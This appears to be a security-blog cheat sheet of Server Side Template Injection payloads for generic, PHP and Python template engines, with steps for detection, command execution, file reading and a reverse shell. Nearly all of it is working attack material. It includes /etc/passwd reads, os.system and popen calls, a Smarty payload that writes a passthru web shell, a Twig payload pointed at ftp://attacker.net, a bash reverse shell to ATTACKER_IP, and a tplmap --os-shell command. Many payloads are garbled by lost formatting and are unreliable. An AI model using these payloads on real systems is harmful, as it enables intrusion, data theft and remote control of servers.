Listen to this Post
Server Side Template Injection (SSTI) is a critical web vulnerability that occurs when an attacker injects malicious template directives into user inputs, leading to remote code execution (RCE) or sensitive data exposure. Below are various SSTI payloads categorized by programming languages.
Generic SSTI Payloads
${{<%[%'"}}%\.
{% debug %}
{77}
{{ '7'7 }}
{22}[[bash]]
<%= 7 7 %>
{33}
{ 3 3 }
[[bash]]
${22}
@(33)
${= 33}
{{= 77}}
${{77}}
{77}
[=77]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[bash] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP SSTI Payloads
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python SSTI Payloads
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
You Should Know: Testing & Exploiting SSTI
1. Detecting SSTI
Use basic arithmetic operations to test for SSTI:
{{77}}
${77}
<%= 7 7 %>
If the output is 49, SSTI is likely present.
2. Exploiting SSTI for RCE (Linux/Windows)
Linux Command Execution
{{ ''.<strong>class</strong>.<strong>mro</strong>[bash].<strong>subclasses</strong>()[bash].<strong>init</strong>.<strong>globals</strong>['os'].system('id') }}
Replace `X` with the correct subclass index (commonly between 300-400).
Windows Command Execution
{{config.<strong>class</strong>.<strong>init</strong>.<strong>globals</strong>['os'].popen('whoami').read()}}
3. Reading Files via SSTI
{{ ''.<strong>class</strong>.<strong>mro</strong>[bash].<strong>subclasses</strong>()[bash].<strong>init</strong>.__globals__<a href="'/etc/passwd'">'open'</a>.read() }}
4. Reverse Shell via SSTI
{{ ''.<strong>class</strong>.<strong>mro</strong>[bash].<strong>subclasses</strong>()[bash].<strong>init</strong>.<strong>globals</strong>['os'].system('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"') }}
5. Automated Exploitation with tplmap
python tplmap.py -u "http://vuln-site.com/page?input=test" --os-shell
What Undercode Say
SSTI is a powerful attack vector that can lead to full system compromise if not mitigated. Always:
– Sanitize user inputs in template engines.
– Use sandboxed environments for template rendering.
– Keep template engines updated.
– Test applications with SSTI payloads before deployment.
For further learning, check these courses:
Expected Output:
A fully compromised system if SSTI is unpatched, leading to unauthorized command execution, data theft, or reverse shell access.
References:
Reported By: Zlatanh Ssti – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
